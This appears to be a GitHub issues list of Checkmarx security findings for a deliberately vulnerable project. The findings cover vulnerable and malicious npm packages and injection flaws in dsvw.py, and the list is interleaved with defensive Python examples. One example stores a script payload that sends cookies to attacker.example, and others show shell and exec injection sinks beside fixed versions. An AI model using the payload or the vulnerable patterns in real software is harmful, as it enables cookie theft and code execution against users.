
small-project's People

Contributors

hmmachadocx, pedrompflopes

small-project's Issues

CVE-2022-25927 @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2022-25927
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


Versions of the package ua-parser-js 0.7.30 through 0.7.32, and 0.8.1 through 1.0.32 are vulnerable to Regular Expression Denial of Service (ReDoS) via the "trim()" function.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 0.7.33

Stored_XSS @ /dsvw.py

Checkmarx (SAST): Stored_XSS
Security Issue: Read More about Stored_XSS
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13


The method do_GET embeds untrusted data in generated output with write, at line 80 of /dsvw.py. This untrusted data is embedded into the output without proper sanitization or encoding, enabling an attacker to inject malicious code into the generated web-page.

The attacker would be able to alter the returned web page by saving malicious data in a data-store ahead of time. The attacker's modified data is then read from the database by the do_GET method with connection, at line 26 of /dsvw.py. This untrusted data then flows through the code straight to the output web page, without sanitization. 

This can enable a Stored Cross-Site Scripting (XSS) attack.

Result #1:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. connection: /dsvw.py[26,288]
    2. cursor: /dsvw.py[26,299]
    3. cursor: /dsvw.py[26,32]
    4. cursor: /dsvw.py[30,21]
    5. cursor: /dsvw.py[31,262]
    6. fetchall: /dsvw.py[31,269]
    7. row: /dsvw.py[31,251]
    8. row: /dsvw.py[31,246]
    9. _: /dsvw.py[31,237]
    10. _: /dsvw.py[31,234]
    11. format: /dsvw.py[31,209]
    12. append: /dsvw.py[31,237]
    13. CxComprehensionVar31_237: /dsvw.py[31,209]
    14. CxComprehensionVar31_237: /dsvw.py[31,237]
    15. join: /dsvw.py[31,190]
    16. format: /dsvw.py[31,185]
    17. append: /dsvw.py[31,251]
    18. CxComprehensionVar31_251: /dsvw.py[31,185]
    19. CxComprehensionVar31_251: /dsvw.py[31,251]
    20. join: /dsvw.py[31,166]
    21. format: /dsvw.py[31,160]
    22. content: /dsvw.py[31,21]
    23. content: /dsvw.py[78,71]
    24. content: /dsvw.py[80,41]
    25. format: /dsvw.py[80,38]
    26. encode: /dsvw.py[80,125]
    27. write: /dsvw.py[80,24]
    Review result in Checkmarx One: Stored_XSS

Result #2:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. read: /dsvw.py[37,152]
    2. decode: /dsvw.py[37,159]
    3. content: /dsvw.py[37,21]
    4. content: /dsvw.py[78,71]
    5. content: /dsvw.py[80,41]
    6. format: /dsvw.py[80,38]
    7. encode: /dsvw.py[80,125]
    8. write: /dsvw.py[80,24]
    Review result in Checkmarx One: Stored_XSS

Result #3:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. loads: /dsvw.py[35,42]
    2. str: /dsvw.py[35,31]
    3. content: /dsvw.py[35,21]
    4. content: /dsvw.py[78,71]
    5. content: /dsvw.py[80,41]
    6. format: /dsvw.py[80,38]
    7. encode: /dsvw.py[80,125]
    8. write: /dsvw.py[80,24]
    Review result in Checkmarx One: Stored_XSS
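
Added example, not code from small-project or dsvw.py: the flow this finding describes (rows read from a data store and formatted straight into the page) next to the same flow with output encoding at the sink. The SQLite table, its two rows and the HTML templates are constructed for the example and are assumptions about what the handler renders.

```python
import html
import sqlite3

# Constructed sample data: one benign comment and one stored "ahead of time"
# by an attacker, exactly the precondition the Stored_XSS finding describes.
SEED_ROWS = [
    ("alice", "Nice site!"),
    ("mallory", "<script>document.location='https://attacker.example/?c='"
                "+document.cookie</script>"),
]

# Assumed templates; the real dsvw.py markup is not reproduced here.
ROW_TEMPLATE = "<tr><td>{}</td><td>{}</td></tr>"
PAGE_TEMPLATE = "<html><body><table>{}</table></body></html>"


def open_store():
    """Return an in-memory SQLite database seeded with SEED_ROWS (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    conn.executemany("INSERT INTO comments VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def render_vulnerable(conn):
    """Mirror the flagged flow: connection -> cursor -> fetchall -> format -> write.
    Whatever mallory stored becomes live markup in every visitor's browser."""
    rows = conn.execute("SELECT author, body FROM comments").fetchall()
    table = "".join(ROW_TEMPLATE.format(author, body) for author, body in rows)
    return PAGE_TEMPLATE.format(table)


def render_safe(conn):
    """Same flow with encoding at the sink: each untrusted field is HTML-escaped
    for the context it lands in (element text inside <td>)."""
    rows = conn.execute("SELECT author, body FROM comments").fetchall()
    table = "".join(
        ROW_TEMPLATE.format(html.escape(author, quote=True),
                            html.escape(body, quote=True))
        for author, body in rows
    )
    return PAGE_TEMPLATE.format(table)


def contains_live_script(page):
    """Crude detector used to compare the two renderings: is there a real
    <script> start tag in the output (as opposed to the escaped &lt;script&gt;)?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    conn = open_store()
    print("vulnerable page executes stored script:", contains_live_script(render_vulnerable(conn)))
    print("safe page executes stored script:      ", contains_live_script(render_safe(conn)))
```

Escaping at the sink rather than at the insert point is deliberate: the same row may later be written into a JSON response or an attribute, and each context needs its own encoding. Escaping on the way in would also leave every existing row in the store unprotected.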

Cx0b414307-5d4b @ Npm-lodash-4.17.11

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx0b414307-5d4b
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


Prototype Pollution vulnerability in lodash before 4.17.19.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: LOW
Availability impact: LOW
Remediation Upgrade Recommendation: 4.17.21

Command_Injection @ /dsvw.py

Checkmarx (SAST): Command_Injection
Security Issue: Read More about Command_Injection
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13


The application's do_GET method calls an OS (shell) command with envs, at line 57 of /dsvw.py, using an untrusted string with the command to execute.  

This could allow an attacker to inject an arbitrary command, and enable a Command Injection attack.

The attacker may be able to inject the executed command via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Result #1:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]
    Review result in Checkmarx One: Command_Injection

Multiple RUN, ADD, COPY, Instructions Listed @ /Dockerfile

Checkmarx (IaC-Security): Multiple RUN, ADD, COPY, Instructions Listed
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: NEW
Scan ID: bfdb0fc0-6df8-4b56-9ace-89e458990d8a


Multiple commands (RUN, COPY, ADD) should be grouped in order to reduce the number of layers.

Locations:

    File: /Dockerfile[0,0]
    Expected value: The 'Dockerfile' contains any 'USER' instruction
    Actual value: The 'Dockerfile' does not contain any 'USER' instruction
    Review result in Checkmarx One: Multiple RUN, ADD, COPY, Instructions Listed

CVE-2021-4229 @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2021-4229
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


A vulnerability was found in ua-parser-js 0.7.29, 0.8.0, and 1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 0.7.33

CVE-2020-2875 @ Maven-mysql:mysql-connector-java-5.1.18

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2020-2875
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: MEDIUM
State: NOT_IGNORED
Status: NEW
Scan ID: bfdb0fc0-6df8-4b56-9ace-89e458990d8a


Additional Info
Attack vector: Network
Attack complexity: HIGH
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 2.10.5

Cxbec87a55-fe55 @ Npm-node-ipc-9.2.2

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxbec87a55-fe55
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process; analysis is done at scale automatically via multiple engines. Once there is a risk suspicion, it is forwarded to a security researcher for manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It is common for malicious payloads to execute themselves automatically upon installing or using the package.

While some dependency vulnerabilities may be kept as known issues for risk-management reasons, the same does not apply to a malicious package, which should be removed with the highest priority.


Additional Info

CVE-2021-23337 @ Npm-lodash-4.17.11

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2021-23337
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


lodash and lodash-es prior to 4.17.21, are vulnerable to Command Injection via the "template" function. lodash.template versions are vulnerable, too.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 4.17.21

Cxba94c01e-a95d @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxba94c01e-a95d
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package executes a crypto mining software

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes network and filesystem activity. In case a crypto mining behavior is detected, this risk is shown.



Additional Info

Cx9f739bef-35bb @ Npm-flow-dev-tools-99.10.9

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx9f739bef-35bb
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package is using dependency confusion attack

About

Dependency Confusion is a technique discovered by @alex.birsan to hijack a privately used package by registering its name (if available) on a public registry with a higher version number. This may cause artifact servers and build tools to "confuse" the two and use the attacker's package.

For example, consider the private package "my-company-utils" hosted on a private artifact server.

If an attacker targets the "my-company-utils" package, as long as the name is not already taken on the official package registry, they are free to register it. If the attacker registers it and publishes with a very high version number such as "v99.99.99", the automatic update logic and version comparison functions will most likely "confuse" the two and prefer the attacker's package.

As an additional mitigation step, we recommend using our open-source tool DustiLock as a CI step.


Additional Info

CVE-2020-8203 @ Npm-lodash-4.17.11

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2020-8203
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.


Additional Info
Attack vector: NETWORK
Attack complexity: HIGH
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 4.17.21

CVE-2019-10744 @ Npm-lodash-4.17.11

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2019-10744
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


A Prototype Pollution vulnerability was discovered in lodash prior to 4.17.12, in lodash.defaultsdeep prior to 4.6.1, and in @sailshq/lodash prior to 3.10.4. The function 'defaultsDeep' allows a malicious user to modify the prototype of Object via '{constructor: {prototype: {...}}}' causing the addition or modification of an existing property that will exist on all objects.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 4.17.21

Code_Injection @ /dsvw.py

Checkmarx (SAST): Code_Injection
SAST - CWE: CWE-94
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT


The application's do_GET method receives and dynamically executes user-controlled code using exec, at line 57 of /dsvw.py. This could enable an attacker to inject and run arbitrary code.

The attacker can inject the executed code via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]
    5. exec: /dsvw.py[57,21]


Checkmarx One
Review in Checkmarx: Code_Injection
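
Added example, not the project's code: the two sinks named in the Command_Injection and Code_Injection findings above (a shell command and exec, both fed from the User-Agent header) next to versions that keep the header as data. The header values are constructed; the allowlist pattern for a product token is an assumption, not something dsvw.py does.

```python
import re
import subprocess

# Constructed request headers. The first carries a shell metacharacter, the
# second a quote that closes a Python string literal.
SHELL_UA = "Mozilla/5.0; echo INJECTED"
CODE_UA = "'; pwned = True; x = '"


def log_user_agent_vulnerable(user_agent):
    """Shell sink: the header is spliced into a command string handed to /bin/sh,
    so ';' ends the intended command and starts the attacker's."""
    result = subprocess.run("echo " + user_agent, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def log_user_agent_safe(user_agent):
    """Same logging without a shell: argv is a list, the header is a single
    argument, and any metacharacters in it are inert bytes."""
    result = subprocess.run(["echo", user_agent], capture_output=True, text=True)
    return result.stdout


def record_user_agent_vulnerable(user_agent):
    """Interpreter sink: Python source is built from the header and exec'd.
    Returns the namespace exec populated so the side effect is visible."""
    namespace = {}
    exec("ua = '%s'" % user_agent, namespace)
    return {k: v for k, v in namespace.items() if k != "__builtins__"}


# Assumed allowlist for the first product token, e.g. "Mozilla/5.0".
PRODUCT_TOKEN = re.compile(r"^[A-Za-z0-9._-]+/[A-Za-z0-9._-]+$")


def record_user_agent_safe(user_agent):
    """Treat the header as data: keep only a product token matching the strict
    pattern above and never hand any of it to exec or a shell."""
    parts = user_agent.split()
    token = parts[0] if parts else ""
    if not PRODUCT_TOKEN.match(token):
        raise ValueError("rejected User-Agent")
    return {"ua": token}


if __name__ == "__main__":
    print(log_user_agent_vulnerable(SHELL_UA))      # two lines: the second is attacker output
    print(log_user_agent_safe(SHELL_UA))            # one line, metacharacters printed literally
    print(record_user_agent_vulnerable(CODE_UA))    # namespace now contains pwned=True
    print(record_user_agent_safe("Mozilla/5.0 (X11; Linux x86_64)"))
```

Note that quoting or escaping the header before interpolation is not the fix: the safe variants never give an interpreter a string that contains untrusted bytes at all, which holds regardless of which shell or Python version is on the box.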

Information_Exposure1 @ /File1.java

Checkmarx (SAST): Information_Exposure1
SAST - CWE: CWE-547
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: RECURRENT


In getMd5, the application protects sensitive data using a cryptographic algorithm, getInstance, that is considered weak or even trivially broken, in /src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java at line 55.

Scan ID: 853146fc-fdfe-41da-acda-485e520b7041

Attack Vector

    1. passwordSalt: /src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java[57,32]
    2. salted: /src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java[57,12]
    3. salted: /src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java[59,29]


Checkmarx One
Review in Checkmarx: Information_Exposure1

Cxdca8e59f-8bfe @ Npm-inflight-1.0.6

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxdca8e59f-8bfe
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


In NPM inflight there is a Memory Leak because some resources are not freed correctly after being used. It appears to affect all versions, as the issue was not addressed and no fix is found. NOTE: In the meantime, logdna-agent, a package that depends on inflight, has merged a commit to address this solely in their package (so it should be fixed in logdna-agent in versions 1.6.5 and later). Node-glob, a package that also depends on inflight, was also planning to address this by not using inflight after version 8 is released, but it is still being used.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH

Cx8079a3fb-ff1f @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx8079a3fb-ff1f
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package downloads a harmful file.
File hash:
7f986cd3c946f274cdec73f80b84855a77bc2a3c765d68897fbc42835629a5d5

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.



Additional Info

Cx7401d0a9-2786 @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx7401d0a9-2786
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package downloads a harmful file.
File hash:
ea131cc5ccf6aa6544d6cb29cdb78130feed061d2097c6903215be1499464c2e

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.



Additional Info

Healthcheck Instruction Missing @ /Dockerfile

Checkmarx (IaC-Security): Healthcheck Instruction Missing
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


Ensure that HEALTHCHECK is being used. The HEALTHCHECK instruction tells Docker how to test a container to check that it is still working

Locations:

Result #1:
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
    File: /Dockerfile[3,0]
    Expected value: Dockerfile should contain instruction 'HEALTHCHECK'
    Actual value: Dockerfile doesn't contain instruction 'HEALTHCHECK'
    Review result in Checkmarx One: Healthcheck Instruction Missing

CVE-2017-1000048 @ Npm-qs-6.0.0

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2017-1000048
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


The web framework using ljharb's qs module older than v6.3.2, v6.2.3, v6.1.2, and v6.0.4 is vulnerable to a DoS. A malicious user can send an evil request to cause the web framework to crash.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 6.2.4

Cx6bee2138-4df0 @ Npm-flow-dev-tools-99.10.9

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx6bee2138-4df0
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process; analysis is done at scale automatically via multiple engines. Once there is a risk suspicion, it is forwarded to a security researcher for manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It is common for malicious payloads to execute themselves automatically upon installing or using the package.

While some dependency vulnerabilities may be kept as known issues for risk-management reasons, the same does not apply to a malicious package, which should be removed with the highest priority.


Additional Info

CVE-2020-20160 @ GoModules-github.com/dgrijalva/jwt-go-v3.2.0

Vulnerable Package issue exists @ GoModules-github.com/dgrijalva/jwt-go-v3.2.0 in branch main

Namespace: hmmachadocx
Repository: small-project
Repository Url: https://github.com/hmmachadocx/small-project.git
CxAST-Project: My-Test-Org/My-Repo-Name
CxAST platform scan: f7f10bde-1230-4049-b49d-62ce8be2e7ae
Branch: main
Application: small-project
Severity: HIGH
State: NOT_IGNORED
Status: NEW
CWE: CWE-284


Additional Info
Attack vector: Network
Attack complexity: HIGH
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 2.11.5


References
Advisory

Unpinned Package Version in Apk Add @ /Dockerfile

Unpinned Package Version in Apk Add issue exists @ Dockerfile in branch feature/my-awesome-change

Package version pinning reduces the range of versions that can be installed, reducing the chances of failure due to unanticipated changes

Namespace: hmmachadocx
Repository: small-project
Repository Url: https://github.com/hmmachadocx/small-project
CxAST-Project: hmmachadocx/small-project
CxAST platform scan: ed30c36a-3e75-4b94-9cdc-8330b464ad48
Branch: feature/my-awesome-change
Application: small-project
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT

Cx21f588f7-f9cb @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx21f588f7-f9cb
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process; analysis is done at scale automatically via multiple engines. Once there is a risk suspicion, it is forwarded to a security researcher for manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It is common for malicious payloads to execute themselves automatically upon installing or using the package.

While some dependency vulnerabilities may be kept as known issues for risk-management reasons, the same does not apply to a malicious package, which should be removed with the highest priority.


Additional Info

Cxa45b0853-bee2 @ Npm-momnet-2.29.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxa45b0853-bee2
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package name is similar to other popular package "moment"

About

Typosquatting attacks rely on typing errors in installation commands or manifest files.

For example, take the popular npm package moment, which has tens of millions of weekly downloads.

A user who wants this package issues the npm install command like so:

npm install moment

However, users sometimes make typos, so another user might write:

npm install momnet

In this case, if a package exists under the typosquatted name, it will be fetched and used.

Attackers find this method effective and usually copy the original functionality and metadata to avoid detection. Typosquatting is one way to mislead developers into downloading the wrong package, and it usually comes with a malicious payload.


Additional Info
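
Added example, not the project's code or the Checkmarx engine: an offline manifest audit covering the two supply-chain findings explained on this page, the typosquat (momnet vs moment) and the dependency-confusion candidate (flow-dev-tools 99.10.9). The package.json and package-lock.json contents are constructed to mirror the package names in this report; the popular-package list, the set of internal package names and the private registry host are assumptions.

```python
import json
from urllib.parse import urlparse

# Constructed inputs mirroring the names in this report.
PACKAGE_JSON = json.dumps({"dependencies": {
    "momnet": "2.29.1",
    "lodash": "4.17.11",
    "flow-dev-tools": "99.10.9",
    "ua-parser-js": "0.7.29",
}})
PACKAGE_LOCK = json.dumps({"packages": {
    "node_modules/momnet": {"version": "2.29.1",
        "resolved": "https://registry.npmjs.org/momnet/-/momnet-2.29.1.tgz"},
    "node_modules/lodash": {"version": "4.17.11",
        "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.11.tgz"},
    "node_modules/flow-dev-tools": {"version": "99.10.9",
        "resolved": "https://registry.npmjs.org/flow-dev-tools/-/flow-dev-tools-99.10.9.tgz"},
    "node_modules/ua-parser-js": {"version": "0.7.29",
        "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.29.tgz"},
}})
# Assumptions: a short list of well-known names, the names an organisation
# publishes only in-house, and the host those must resolve from.
POPULAR_PACKAGES = ["moment", "lodash", "express", "react", "ua-parser-js"]
INTERNAL_PACKAGES = {"flow-dev-tools"}
PRIVATE_REGISTRY_HOST = "npm.internal.example"


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions,
    so 'momnet' is one step from 'moment'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(manifest_json, popular=POPULAR_PACKAGES, max_distance=1):
    """Dependencies whose name is within max_distance edits of a well-known
    package but is not that package. Returns [(declared_name, lookalike_of)]."""
    deps = json.loads(manifest_json).get("dependencies", {})
    findings = []
    for name in deps:
        if name in popular:
            continue
        for well_known in popular:
            if osa_distance(name, well_known) <= max_distance:
                findings.append((name, well_known))
    return findings


def dependency_confusion_candidates(lock_json, internal=INTERNAL_PACKAGES,
                                    private_host=PRIVATE_REGISTRY_HOST):
    """Internal package names that the lockfile resolved from anywhere other than
    the private registry. Returns [(name, version, host_it_came_from)]."""
    packages = json.loads(lock_json).get("packages", {})
    findings = []
    for path, meta in packages.items():
        name = path.rsplit("node_modules/", 1)[-1]
        if name not in internal:
            continue
        host = urlparse(meta.get("resolved", "")).hostname
        if host != private_host:
            findings.append((name, meta.get("version"), host))
    return findings


if __name__ == "__main__":
    print("typosquats:", typosquat_candidates(PACKAGE_JSON))
    print("confusion :", dependency_confusion_candidates(PACKAGE_LOCK))
```

The lockfile check is the after-the-fact view; the preventive controls are scoping internal packages under a registry-reserved @scope and configuring the client so that scope can only resolve from the private host. An implausibly high version such as 99.x on an internal name is a useful second signal for the same condition.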

Cx4ca27ec0-0c96 @ Npm-scs-0.0.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx4ca27ec0-0c96
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package downloads a harmful file.
File hash:
7f986cd3c946f274cdec73f80b84855a77bc2a3c765d68897fbc42835629a5d5

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.



Additional Info

Missing_HSTS_Header @ /dsvw.py

Checkmarx (SAST): Missing_HSTS_Header
SAST - CWE: CWE-346
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT


The web-application does not define an HSTS header, leaving it vulnerable to attack.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. send_header: /dsvw.py[76,18]


Checkmarx One
Review in Checkmarx: Missing_HSTS_Header

Command_Injection @ /dsvw.py

Checkmarx (SAST): Command_Injection
SAST - CWE: CWE-77
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT


The application's do_GET method calls an OS (shell) command with envs, at line 57 of /dsvw.py, using an untrusted string with the command to execute.  

This could allow an attacker to inject an arbitrary command, and enable a Command Injection attack.

The attacker may be able to inject the executed command via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]


Checkmarx One
Review in Checkmarx: Command_Injection

Information_Exposure1 @ /File1.java

Checkmarx (SAST): Information_Exposure1
Security Issue: Read More about Information_Exposure1
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
Scan ID: bfdb0fc0-6df8-4b56-9ace-89e458990d8a


In getMd5, the application protects sensitive data using a cryptographic algorithm, getInstance, that is considered weak or even trivially broken, in /src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java at line 55.

Unsafe_Use_Of_Target_blank @ /dsvw.py

Checkmarx (SAST): Unsafe_Use_Of_Target_blank
Security Issue: Read More about Unsafe_Use_Of_Target_blank
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
